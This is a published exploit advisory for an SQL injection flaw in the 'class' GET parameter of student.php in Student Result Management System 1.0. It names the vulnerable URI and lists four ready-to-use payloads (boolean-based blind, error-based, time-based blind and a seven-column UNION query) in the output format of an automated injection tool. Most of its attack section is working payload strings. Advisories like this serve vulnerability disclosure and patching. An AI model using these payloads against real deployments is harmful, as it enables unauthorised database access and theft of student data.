Authored by Riadh Benlamine

Student Result Management System version 1.0 remote SQL injection exploit. This is a variant of the original discovery of SQL injection in this version by Ritesh Gohil.

# Exploit Title: Student Result Management System 1.0 - 'class' SQL Injection
# Date: 09.09.2020
# Exploit Author: Riadh Benlamine (rbn0x00)
# Vendor Homepage : https://projectworlds.in
# Software Page: https://projectworlds.in/free-projects/php-projects/student-result-management-system-project-in-php/
# Version: 1.0
# Category: Webapps
# Tested on: Apache2+MariaDB latest version
# Description : student.php is prone to an SQL-injection vulnerability because it fails to sanitize user input before pushing it into SQL query.Exploiting this issue could allow the attacker to compromise the server.

The vulnerable parameter uri: /srms/student.php?class=<injection point>

exploit:

Parameter: class (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: class=-6346' OR 3657=3657#&rn=1

Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: class=1' OR (SELECT 3201 FROM(SELECT COUNT(*),CONCAT(0x71786a7171,(SELECT (ELT(3201=3201,1))),0x71766b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- hNXT&rn=1

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: class=1' AND (SELECT 1049 FROM (SELECT(SLEEP(5)))gIdB)-- yYYR&rn=1

Type: UNION query
Title: MySQL UNION query (random number) - 7 columns
Payload: class=1' UNION ALL SELECT 8674,8674,8674,CONCAT(0x71786a7171,0x45414967666b57777145704f476d6566766d6f694d707561566e6150744d73505370466e7a6c784c,0x71766b7a71),8674,8674,8674#&rn=1